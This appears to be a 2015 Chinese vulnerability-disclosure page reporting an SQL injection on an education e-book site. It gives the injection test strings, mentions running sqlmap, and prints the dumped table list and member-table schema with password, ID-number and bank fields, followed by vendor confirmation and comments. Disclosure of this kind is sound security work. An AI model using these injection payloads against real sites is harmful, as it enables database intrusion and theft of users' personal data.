漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:圣才学习网某处SQL注入导致管理员账号泄漏+20万用户数据泄漏(涉及手机号、邮箱、QQ号等敏感信息)
提交时间:2015-05-18 00:32
修复时间:2015-07-02 00:54
公开时间:2015-07-02 00:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-18: 厂商已经确认,细节仅向厂商公开 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
简要描述: 介绍:圣才学习网是圣才教育旗下官方学习网站。 网站旗下包含考研考博、英语、经济、证券、金融、保险、管理、外贸、财会、统计、精算师、心理、教育、法学、医学、新闻传播、编辑出版、工程、IT、国家职业资格、公务员、秘书、汉语、导游、学科竞赛等50个专业子网站。是这个新网站,感觉影响力还可以。 圣才学习网某处SQL注入导致管理员账号泄漏+20万用户数据泄漏
详细说明: 1、圣才学习网
2、漏洞地址(用户需要登陆)
3、注入语句 2015051416054192' and '123'='123 有数据 2015051416054192' and '123'='12 无数据 2015051416054192' and 1=(select @@VERSION) and '123'='123 版本号 2015051416054192' and 1=db_name() and '123'='123 数据库信息 4、抓包信息
5、SqlMap中跑一下
漏洞证明: 1、手动注入信息
2、版本信息
3、数据库
4、用户名
5、管理员信息
未进行md5破解 6、用户表
Database: SCEbook [146 tables] +------------------------------------+ | AdminRight | | AdminRole | | AdminUser | | Advertisement | | Agent | | AllMemberInfo | | All_TJ | | All_TJ_Download_Exam | | All_TJ_Download_Exam_TK | | All_TJ_Download_XXSub | | All_TJ_TK | | ApplePrice | | BankList | | BlackListIP | | BookAgent | | BookRelate | | Config | | ConfigCode | | CorpInfo | | Data | | DataCategory | | DataCheckReason | | DataOperate | | DataReport | | DictionaryTable | | DomainCategory | | EBookArr | | EBookConverting | | EBookIdAndAgent | | EBookIdAndAgentRenda | | EBook_Media | | Ebook | | EbookActMember | | EbookAdvertisement | | EbookCategory | | EbookCategoryFTP | | EbookCategorySub | | EbookCategorySub_Ebook | | EbookCheckReason | | EbookComment | | EbookCommentReply | | EbookDemo | | EbookDraft | | EbookEvaluateSetting | | EbookExpire | | EbookFeedBack | | EbookFeedBackReply | | EbookGroup | | EbookGroupElement | | EbookOperate | | EbookPwd | | EbookPwdGenerate | | EbookRecommend | | EbookRecommendDetail | | EbookXueXi | | Ebook_Apple | | Ebook_Dangdang | | EditorTool | | EmailTemplate | | Experience | | FeeItem | | FileInFolder | | FolderCategory | | FolderCategorySub | | FolderCategorySub_Ebook | | FolderCategory_TJ | | Help | | HelpCategory | | IpAddress | | Log | | MaterialPackage | | MaterialRegistrationCodeModel | | Member | | MemberAttr | | MemberBankList | | MemberBuy | | MemberBuy_Stolen | | MemberBuy_del | | MemberClass | | MemberClassRight | | MemberFocus | | MemberInstitute | | MemberInvoice | | MemberNetDisk | | MemberOrder | | MemberOrderPay | | MemberRight | | MemberRightItem | | MemberRightItemCategory | | MemberSearchTJ | | Menu | | Message | | MobileAdvisement | | MobileInstructImage | | MobileInterfaceLimit | | MoneyWater | | News | | PageSeo | | PayConfiguration | | PlatBookDownLoad | | PlatBookDownLoading | | PlatBookDownload_LastDay | | PlatBookDownload_LastMonth | | PlatBookDownload_LastYear | | PlatBookPublish | | PlatBookPublishAndPlatBookDownLoad | | PlatBookPublish_EbookTK | | PlatBookPublish_EbookTK_WithHezuo | | PlatCross | | PricePasswordTJ | | QQOpenId | | Question | | QuestionReply | | QuoteProduct | | RegistrationAttr | | RegistrationCodeBatch | | RegistrationCodeBatch_bak | | RegistrationCodeModel | | RegistrationCodeModelBak | | RegistrationCodeModel_del | | ScNetDisk | | Score | | ScoreExchange | | ScoreWater | | TestCatTree | | Tree | | UserSearchTJ | | VEbookAndApple | | VEbookDownLoadCount | | VRenda | | V_FavorAndDownloadList | | V_MemberBuyInfo | | VarSize | | View_1 | | View_2 | | View_EbookAndTb_E_QuestionPlan | | View_MemberOrderForCenterU | | Word | | WordCategory | | XXProductBuy | | XXProductBuy_TJ | | XXProductBuy_TJ_exam | | book | | tempT | | v_AliveCodeEBook | | v_AliveCodeTiKu | +------------------------------------+ Database: SCEbook Table: Member [60 columns] +----------------------+----------+ | Column | Type | +----------------------+----------+ | Address | varchar | | AddTime | datetime | | AllUserId | int | | BankNo | varchar | | CellPhone | varchar | | CertificateApplyTime | datetime | | CertificateType | int | | City | varchar | | Class | int | | client_key | varchar | | ContactMan | nchar | | ContactQQ | nchar | | ContactTel | nchar | | CorpLogo | varchar | | CostermerServiceQQ | nvarchar | | CostermerServiceTel | nvarchar | | DomainName | nvarchar | | Education | varchar | | Email | varchar | | EndTime | datetime | | Id | varchar | | IdNo | varchar | | IsAgency | int | | IsCertificate | int | | IsDefaultSign | int | | IsForbidden | int | | IsValidEmail | int | | LoginCount | int | | MemberAdmin | int | | MemberLogo | nvarchar | | Name | varchar | | NickName | varchar | | OauthType | int | | OfficialWebSite1 | nvarchar | | OfficialWebSite2 | nvarchar | | OpenId | varchar | | PayNo | varchar | | Phone | varchar | | Photo | varchar | | PostCode | varchar | | Publisher | nvarchar | | Pwd | varchar | | QQ | varchar | | RealName | varchar | | RecentLoginIp | varchar | | RecentLoginProvince | varchar | | RecentLoginTime | datetime | | RegIp | varchar | | RegProvince | varchar | | SendKeyTime | datetime | | Sex | varchar | | SiteIntroduction | ntext | | SiteName | nvarchar | | SiteSign | ntext | | StartTime | datetime | | TenpayNo | varchar | | ValidEmail | varchar | | ValidEmailKey | varchar | | Writer | varchar | | WriterBrief | varchar | +----------------------+----------+ Database: SCEbook Table: AllMemberInfo [73 columns] +----------------------+----------+ | Column | Type | +----------------------+----------+ | Address | varchar | | AddTime | datetime | | BankNo | varchar | | CellPhone | varchar | | CertificateApplyTime | datetime | | CertificateType | int | | City | varchar | | Class | int | | client_key | varchar | | ContactMan | nchar | | ContactQQ | nchar | | ContactTel | nchar | | CorpLogo | varchar | | CostermerServiceQQ | nvarchar | | CostermerServiceTel | nvarchar | | DomainName | nvarchar | | Education | varchar | | Email | varchar | | EndTime | datetime | | Expr1 | varchar | | Expr2 | datetime | | Ext1 | varchar | | Ext10 | varchar | | Ext2 | varchar | | Ext3 | varchar | | Ext4 | varchar | | Ext5 | varchar | | Ext6 | varchar | | Ext7 | varchar | | Ext8 | varchar | | Ext9 | varchar | | Id | varchar | | IdNo | varchar | | IsAgency | int | | IsCertificate | int | | IsCheck | bit | | IsDefaultSign | int | | IsForbidden | int | | IsValidEmail | int | | LicencePic | varchar | | LoginCount | int | | MemberAdmin | int | | MemberLogo | nvarchar | | Name | varchar | | NickName | varchar | | OauthType | int | | OfficialWebSite1 | nvarchar | | OfficialWebSite2 | nvarchar | | OpenId | varchar | | PayNo | varchar | | Phone | varchar | | Photo | varchar | | PostCode | varchar | | Publisher | nvarchar | | Pwd | varchar | | QQ | varchar | | RealName | varchar | | RecentLoginIp | varchar | | RecentLoginProvince | varchar | | RecentLoginTime | datetime | | RegIp | varchar | | RegProvince | varchar | | SendKeyTime | datetime | | Sex | varchar | | SiteIntroduction | ntext | | SiteName | nvarchar | | SiteSign | ntext | | StartTime | datetime | | TenpayNo | varchar | | ValidEmail | varchar | | ValidEmailKey | varchar | | Writer | varchar | | WriterBrief | varchar | +----------------------+----------+
7、20万数据证明
点到为止,应该是比较严重的.
修复方案: 漏洞回应 厂商回应: 危害等级:高
漏洞Rank:10
确认时间:2015-05-18 00:53
厂商回复: 谢谢
最新状态: 暂无
漏洞评价:
评论
2015-05-15 17:31 |
sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)
2015-05-15 18:06 |
harbour_bin ( 普通白帽子 | Rank:358 漏洞数:47 | 向TOP200进军!)
2015-05-15 18:28 |
sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)
@harbour_bin 杭州地铁贴的都是这个广告,我还以为你是坐地铁看到的呢
2015-05-15 18:45 |
harbour_bin ( 普通白帽子 | Rank:358 漏洞数:47 | 向TOP200进军!)
@sql小神 哦,嘿嘿.前两天想下载个资料的,习惯性的试了试,然后就这样了